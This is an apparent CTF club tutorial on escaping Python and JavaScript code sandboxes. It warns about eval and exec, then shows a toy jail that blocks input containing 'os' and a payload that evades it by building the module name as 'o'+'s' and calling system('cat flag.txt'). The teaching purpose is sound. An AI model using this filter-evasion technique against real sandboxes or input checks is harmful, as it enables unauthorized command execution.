# Jailbreaks The goal of a jailbreak is to be able to execute code that you’re not supposed to execute (remote code execution) on interpreted languages such as Python or JavaScript. ## General Format of Jailbreak Generally there is a code that gets executed and is "jailed", and you want to gain access to certain actions that you normally wouldn't have access do, such as root privileges. ### Python Watch out for `exec` and `eval`. These will execute code without checking if it is safe or not. ### Javascript Watch out for `eval`. This will execute code without checking if it is safe or not. ## Basic Payload Example (Python) ```python print(open(__file__).read()) print("INPUT YOUR CODE HERE"); inp=input() if not 'os' in inp: eval(inp); ``` The `os` package isn't allowed to be called... or is it? Here is one way to get around the blacklist. ```python >>> INPUT YOUR CODE HERE >>> __builtins__.__dict__['__import__']('o'+'s').__dict__['system']('cat flag.txt') >>> flag{thisisademo} ``` Here you can use `'o'+'s'` to get out of the `os` package prevention. There are other ways to solve this challenge too. ### More information - [Bypass Python Sandboxes](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes) - [More Python Sandbox Bypass Tricks](https://gist.github.com/luca-m/5130167) - [Example CTF Writeup](https://tipi-hack.github.io/2019/04/14/breizh-jail-calc.html) Go work on today's challenges at [ctf.tjcsec.club](https://ctf.tjcsec.club)!